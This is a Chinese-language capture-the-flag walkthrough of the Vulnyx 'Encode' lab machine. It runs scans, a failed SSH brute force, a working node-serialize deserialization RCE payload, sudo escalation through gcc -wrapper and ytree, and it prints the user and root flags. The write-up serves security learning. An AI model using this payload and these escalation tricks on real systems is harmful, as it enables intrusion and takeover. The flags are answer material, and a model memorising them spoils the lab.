Vulnyx-Encode-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.228  08:00:27:d1:79:1e       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.022 seconds (126.61 hosts/sec). 4 responded
❯ export ip=192.168.60.228
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.228:22
Open 192.168.60.228:80
Open 192.168.60.228:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 13:41 CST
Initiating ARP Ping Scan at 13:41
Scanning 192.168.60.228 [1 port]
Completed ARP Ping Scan at 13:41, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:41
Completed Parallel DNS resolution of 1 host. at 13:41, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:41
Scanning 192.168.60.228 [3 ports]
Discovered open port 3000/tcp on 192.168.60.228
Discovered open port 80/tcp on 192.168.60.228
Discovered open port 22/tcp on 192.168.60.228
Completed SYN Stealth Scan at 13:41, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.228
Host is up, received arp-response (0.00046s latency).
Scanned at 2025-03-05 13:41:38 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
3000/tcp open  ppp     syn-ack ttl 64
MAC Address: 08:00:27:D1:79:1E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

模糊测试一下目录

80端口上没有什么有价值的信息

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.228
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 12]
/manual               (Status: 301) [Size: 317] [--> http://192.168.60.228/manual/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

我们根据靶机名称encode猜测大概率目录是进行编码过的，所以常规扫描是扫不出来的

利用wfuzz模糊测试一下，加上编码的payload

好像也没有

❯ wfuzz -c  -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt,base64 -u "http://$ip:3000/FUZZ" --hw 15
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.228:3000/FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000014:   200        0 L      2 W        11 Ch       "http://192.168.60.228:3000/"
000041849:   200        0 L      2 W        11 Ch       "http://192.168.60.228:3000/"

Total time: 272.1738
Processed Requests: 61854
Filtered Requests: 61852
Requests/sec.: 227.2591

Node.js 反序列化

不过我在访问3000端口时，发现响应包中有个cookie记录疑似base64编码的数据

❯ curl -iv $ip:3000
*   Trying 192.168.60.228:3000...
* Connected to 192.168.60.228 (192.168.60.228) port 3000
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 192.168.60.228:3000
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< X-Powered-By: Express
X-Powered-By: Express
< Set-Cookie: profile=eyJ1c2VybmFtZSI6ImNoYXJsaWUiLCJjb3VudHJ5IjoiZWV1dSIsImNpdHkiOiJ3YXNoaW5ndG9uIn0%3D; Max-Age=900; Path=/; Expires=Wed, 05 Mar 2025 06:18:42 GMT; HttpOnly
Set-Cookie: profile=eyJ1c2VybmFtZSI6ImNoYXJsaWUiLCJjb3VudHJ5IjoiZWV1dSIsImNpdHkiOiJ3YXNoaW5ndG9uIn0%3D; Max-Age=900; Path=/; Expires=Wed, 05 Mar 2025 06:18:42 GMT; HttpOnly
< Content-Type: text/html; charset=utf-8
Content-Type: text/html; charset=utf-8
< Content-Length: 11
Content-Length: 11
< ETag: W/"b-OX453OLUbwKdge2BUCoR8u6eN7M"
ETag: W/"b-OX453OLUbwKdge2BUCoR8u6eN7M"
< Date: Wed, 05 Mar 2025 06:03:42 GMT
Date: Wed, 05 Mar 2025 06:03:42 GMT
< Connection: keep-alive
Connection: keep-alive
< Keep-Alive: timeout=5
Keep-Alive: timeout=5
<

* Connection #0 to host 192.168.60.228 left intact
hello serve%

解码一下，得到用户的一些信息

❯ echo "eyJ1c2VybmFtZSI6ImNoYXJsaWUiLCJjb3VudHJ5IjoiZWV1dSIsImNpdHkiOiJ3YXNoaW5ndG9uIn0"|base64 -d
{"username":"charlie","country":"eeuu","city":"washington"}%

利用cupp根据城市国家姓名生成字典

尝试利用字典进行爆破，然而ssh不允许密码连接😅 GG了

❯ python cupp.py -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: charlie
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]: Y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: eeuu,washington
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to charlie.txt, counting 260 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with charlie.txt and shoot! Good luck!
❯ hydra -l charlie -P charlie.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-05 14:10:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.60.228:22/
[ERROR] target ssh://192.168.60.228:22/ does not support password authentication (method reply 4).
❯ ssh adaa@$ip
The authenticity of host '192.168.60.228 (192.168.60.228)' can't be established.
ED25519 key fingerprint is SHA256:FQI6CQCD3uUo59olao5SmG/3b/R9quOafr6mSSLvdlA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.228' (ED25519) to the list of known hosts.
[email protected]: Permission denied (publickey).

显然，路错了，换个方向，利用burpsuite抓一下包

我将Cookie的base64重新编码，发现是可以正常显示我修改后的内容

我随便删一点数据，让他产生报错

发现是基于node.js的反序列化

利用一下payload

[PayloadsAllTheThings/Insecure Deserialization/Node.md at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure Deserialization/Node.md#node-serialize)

[TheHackersLabs-Token Of Love-Walkthrough | Pepster’Blog](https://pepster.me/TheHackersLabs-Token Of Love-Walkthrough/#node-js-Deserialization)

Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}

稍微修改一下，再进行base64编码后重新发包

测试能否正常执行，可以收到靶机发过来的icmp包

{"username":"_$$ND_FUNC$$_function(){require('child_process').exec('ping 192.168.60.100 -c 2', function(error,stdout, stderr) { console.log(stdout) });}()","country":"eeuu","city":"washington"}
------------------------------------------
❯ sudo tcpdump icmp
[sudo] password for Pepster:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
14:33:52.708939 IP 192.168.60.228 > 192.168.60.100: ICMP echo request, id 842, seq 1, length 64
14:33:52.709381 IP 192.168.60.100 > 192.168.60.228: ICMP echo reply, id 842, seq 1, length 64
14:33:53.710871 IP 192.168.60.228 > 192.168.60.100: ICMP echo request, id 842, seq 2, length 64
14:33:53.710883 IP 192.168.60.100 > 192.168.60.228: ICMP echo reply, id 842, seq 2, length 64

用户提权

修改payload，尝试反弹一下shell

可以利用sudo执行gcc提权至charlie

❯ pwncat-cs -lp 4444
[14:51:43] Welcome to pwncat 🐈!                                                                                                 __main__.py:164
[14:52:09] received connection from 192.168.60.228:57140                                                                              bind.py:84
[14:52:09] 0.0.0.0:4444: normalizing shell path                                                                                   manager.py:957
[14:52:10] 192.168.60.228:57140: registered new host w/ db                                                                        manager.py:957
(local) pwncat$
(remote) www-data@encode:/var/www$ sudo -l
Matching Defaults entries for www-data on encode:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on encode:
    (charlie) NOPASSWD: /usr/bin/gcc
(remote) www-data@encode:/var/www$ sudo -u charlie /usr/bin/gcc -wrapper /bin/bash,-s .
charlie@encode:/var/www$ cd ~
charlie@encode:~$ cat user.txt
08dbb8d26b8b558eb171978b5c16c020

Root提权

同时用户charlie也有sudo权限

charlie@encode:~$ sudo -l
Matching Defaults entries for charlie on encode:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charlie may run the following commands on encode:
    (root) NOPASSWD: /usr/bin/ytree

ytree 是一个用于在终端中浏览和管理文件系统的工具。

输入大写X执行命令提权即可

charlie@encode:/var/www$ sudo /usr/bin/ytree
root@encode:/var/www# id
uid=0(root) gid=0(root) grupos=0(root)
root@encode:/var/www# cat /root/root.txt
934ece5373c0361e33394b37c5b49582